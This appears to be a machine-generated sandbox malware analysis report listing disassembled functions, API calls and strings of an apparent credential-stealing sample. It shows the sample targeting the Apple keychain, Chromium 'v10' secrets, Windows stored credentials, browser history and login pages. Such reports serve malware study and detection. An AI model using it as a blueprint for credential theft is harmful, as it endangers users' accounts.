                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                            • memset.MSVCRT ref: 00445986
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                            • API String ID: 2263259095-3798722523
                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                            • API String ID: 2744995895-28296030
                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                                            • memset.MSVCRT ref: 0040B756
                                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                            • memset.MSVCRT ref: 0040B851
                                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • memset.MSVCRT ref: 0040BB53
                                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                            • String ID: chp$v10
                                                                                            • API String ID: 4290143792-2783969131
                                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                            Control-flow Graph (graph image not recoverable from this export)
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004091E2
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                            • String ID:
                                                                                            • API String ID: 3715365532-3916222277
                                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                            • String ID: bhv
                                                                                            • API String ID: 4234240956-2689659898
                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                            Control-flow Graph

                                                                                             Control-flow graph for the function at 00413F4F (basic blocks 00413F4F-00413FA5; calls 0040A804 and then GetProcAddress five times). Graph node data not reproduced.
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2941347001-70141382
                                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                            Control-flow Graph

                                                                                             Control-flow graph for the function at 004466F4 (basic blocks 004466F4-004468DD; calls GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __wgetmainargs, GetStartupInfoW, exit, _cexit and internal functions 00446904, 004153F2, 004468F0, 0041276D, 0044693D). Graph node data not reproduced.
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                            • String ID:
                                                                                            • API String ID: 2827331108-0
                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                            • String ID: visited:
                                                                                            • API String ID: 1157525455-1702587658
                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                            Control-flow Graph

                                                                                             Control-flow graph for the function at 0040E175 (basic blocks 0040E175-0040E2A8; calls memset, free, _snwprintf and internal functions 0040695D, 00406B90, 004069A3, 00406E8F, 00406B53, 0040DD50, 0040AA04, 0040742E, 0040AAE3, 0040A8D0). Graph node data not reproduced.
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                            • API String ID: 2804212203-2982631422
                                                                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 115830560-3916222277
                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                            • API String ID: 2936932814-4196376884
                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            [control-flow graph figure not reproduced in this extraction; basic blocks 40bdb0-40bf6f with calls to 404363, 40440c, 40b2cc, 40bd5d, 404423 and the APIs CredEnumerateW, wcslen, wcsncmp, memset, memcpy, _wcsnicmp, wcschr, LocalFree, as listed under APIs below]
                                                                                            APIs
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                            • String ID:
                                                                                            • API String ID: 697348961-0
                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                            • API String ID: 1829478387-11920434
                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
